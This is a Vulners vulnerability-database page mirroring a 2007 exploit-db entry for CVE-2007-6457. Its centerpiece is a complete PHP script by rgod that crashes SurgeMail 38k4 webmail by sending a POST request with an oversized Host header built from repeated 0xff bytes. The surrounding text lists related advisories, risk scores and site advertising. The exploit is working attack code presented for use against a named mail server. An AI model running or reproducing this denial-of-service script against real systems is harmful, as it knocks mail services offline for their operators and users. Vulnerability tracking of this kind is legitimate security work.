Lucene search
+L

Surgemail 38k4 - webmail Host header Denial of Service

🗓️ 18 Dec 2007 00:00:00Reported by rgodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

SurgeMail v.38k4 webmail Host header denial of service exploit against windows versio

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2007-6457
20 Dec 200700:46
attackerkb
cve
CVE
CVE-2007-6457
20 Dec 200700:00
cve
cvelist
Cvelist
CVE-2007-6457
20 Dec 200700:00
cvelist
euvd
EUVD
EUVD-2007-6423
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-6457
20 Dec 200700:46
nvd
prion
Prion
Stack overflow
20 Dec 200700:46
prion
<?php
/*
  SurgeMail v.38k4 webmail Host header denial of service exploit
  tested against the windows version

  rgod
*/

dl("php_curl.so");
$url = "http://192.168.0.1";
$puf=str_repeat(0xff,0xfff);

        $header ="POST / HTTP/1.0\r\n";
        $header.="Host: $puf\r\n";
        $header.="Connection: Close\r\n\r\n";

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

        $data = curl_exec($ch); if (curl_errno($ch)) {
           print curl_error($ch)."\n";
        } else {
           curl_close($ch);
        }

?>

# milw0rm.com [2007-12-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03676
35